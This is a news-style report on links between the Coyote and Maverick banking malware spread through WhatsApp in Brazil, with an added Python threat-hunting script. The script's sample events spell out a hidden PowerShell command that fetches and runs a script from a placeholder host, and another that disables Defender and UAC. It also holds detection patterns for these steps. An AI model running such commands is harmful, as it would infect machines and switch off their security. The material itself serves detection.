Threat hunters have identified connections between a banking malware named Coyote and a newly emerging malware called Maverick, which is distributed through WhatsApp. According to a report by CyberProof, both forms of malware are developed in .NET, primarily target Brazilian users and financial institutions, and share similar functionalities, including decrypting and monitoring banking applications while spreading via WhatsApp Web.
Maverick was first reported by Trend Micro, which associated it with a threat actor known as Water Saci. The attack chain has two components: SORVEPOTEL, a self-propagating malware delivered through WhatsApp's desktop version as a ZIP file, and the Maverick payload that the ZIP file contains.
This malware monitors browser tabs for URLs of financial institutions in Latin America. When it detects these URLs, it connects to a remote server to retrieve commands for collecting system information and deploying phishing pages to extract credentials.
Cybersecurity firm Sophos raised the possibility that Maverick is connected to earlier campaigns related to Coyote, suggesting that the new threat may be an evolution of it. Analysis by Kaspersky confirmed code similarities between Maverick and Coyote, although Kaspersky considers Maverick a distinct threat impacting users in Brazil.
CyberProof’s findings reveal that the initial ZIP file includes a Windows shortcut which, when executed, uses cmd.exe or PowerShell to connect to an external server for downloading the malware. The PowerShell script is engineered to disable Microsoft Defender Antivirus and User Account Control (UAC), facilitating the retrieval of a .NET loader.
This loader features techniques designed to detect reverse engineering tools and will self-terminate if such tools are detected. It then downloads the main modules for SORVEPOTEL and Maverick, ensuring that the victim is located in Brazil by checking timezone and language settings.
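The infection chain described above (a shortcut inside a ZIP that launches cmd.exe or PowerShell to fetch a payload, followed by a script that disables Defender and UAC) leaves a recognisable footprint in process-creation telemetry. The following Python is an added example written for this page, not code from CyberProof, Trend Micro or any of the vendors cited; it runs simple hunt logic over constructed, Sysmon-style process events (the field names `ParentImage`, `Image`, `CommandLine` and the sample command lines are assumptions, not captured data from this campaign) and scores each host by how much of the chain it exhibits.

```python
import re
from collections import defaultdict

# Constructed process-creation events with Sysmon-style field names.
# They are illustrative only, not telemetry from the Water Saci campaign.
SAMPLE_EVENTS = [
    # Explorer opens a shortcut from a ZIP; the shortcut target is cmd.exe
    # running a hidden PowerShell download (step one of the chain).
    {"host": "WS01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c powershell -w hidden -c "iwr http://example.invalid/stage1 -OutFile %TEMP%\s1.ps1; & %TEMP%\s1.ps1"'},
    # The fetched script tampers with Defender and UAC (step two).
    {"host": "WS01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true; reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"'},
    # Benign activity on a second host: a user opening a text file...
    {"host": "WS02", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\ana\notes.txt"},
    # ...and a scheduled task downloading an installer from an internal server.
    {"host": "WS02", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\Scripts\agent.ps1 Invoke-WebRequest https://updates.corp.invalid/agent.msi"},
]

# Command interpreters that a malicious shortcut would point at.
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")

# Command-line indicators for each stage of the chain. Patterns are
# deliberately coarse; real rules would be tuned per environment.
INDICATORS = {
    "remote_download": re.compile(
        r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b|start-bitstransfer", re.I),
    "defender_tamper": re.compile(
        r"set-mppreference\s+-disable|add-mppreference\s+-exclusion|disablerealtimemonitoring", re.I),
    "uac_tamper": re.compile(r"enablelua|consentpromptbehavioradmin", re.I),
}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def tag_event(event: dict) -> list[str]:
    """Return the indicator tags that apply to a single process event."""
    tags = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    is_shell = image in SHELLS
    # A shell started directly by Explorer is what a double-clicked .lnk looks like.
    if is_shell and parent == "explorer.exe":
        tags.append("explorer_spawned_shell")
    if is_shell:
        for name, pattern in INDICATORS.items():
            if pattern.search(event["CommandLine"]):
                tags.append(name)
    return tags


def hunt(events: list[dict]) -> dict:
    """Aggregate tags per host and rate how much of the chain is present."""
    per_host = defaultdict(set)
    for event in events:
        per_host[event["host"]].update(tag_event(event))
    results = {}
    for host, tags in per_host.items():
        if not tags:
            continue
        dropper = {"explorer_spawned_shell", "remote_download"} <= tags
        tamper = bool(tags & {"defender_tamper", "uac_tamper"})
        if dropper and tamper:
            severity = "high"    # shortcut dropper plus security tampering
        elif dropper:
            severity = "medium"  # shortcut dropper only
        else:
            severity = "low"     # isolated indicator, review in context
        results[host] = {"severity": severity, "tags": sorted(tags)}
    return results


if __name__ == "__main__":
    for host, finding in hunt(SAMPLE_EVENTS).items():
        print(host, finding["severity"], ", ".join(finding["tags"]))
```

The point of the per-host scoring is that no single indicator is conclusive: an administrator's script that calls Invoke-WebRequest produces a lone `remote_download` tag, whereas the shortcut-launched shell followed by Defender and UAC tampering on the same host is rated high. Geofencing checks like the loader's timezone and language test are not visible in process telemetry, so they are better caught in sandbox or script-block logging than here.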
Evidence also suggests the malware’s targeting has expanded to hotels in Brazil. The new campaign by Water Saci incorporates an email-based command-and-control (C2) system with advanced tactics for evading detection and targeting only Portuguese-speaking systems.
The malware includes a sophisticated command-and-control infrastructure for real-time management, which allows operators to pause, resume, and monitor the malware’s activities, effectively turning infected machines into a coordinated botnet.
A new dimension of the Water Saci campaign uses a Visual Basic Script (VBScript) to hijack WhatsApp browser sessions for distributing ZIP files. This technique bypasses authentication, granting immediate access to the victim's WhatsApp account without raising alarms.
The malware then sends personalized messages to all contacts from the compromised account, utilizing harvested data such as cookies and authentication tokens to ensure a seamless operation without alerting users.
Additionally, SORVEPOTEL connects to specific email accounts to retrieve operational commands, even when those accounts are secured with multi-factor authentication, which requires the threat actor to enter authentication codes manually, a practice that adds operational delays.
Overall, both Coyote and Maverick operate within a similar Brazilian cybercriminal ecosystem, marking an evolution in how banking trojans spread by exploiting legitimate platforms and profiles for covert operations.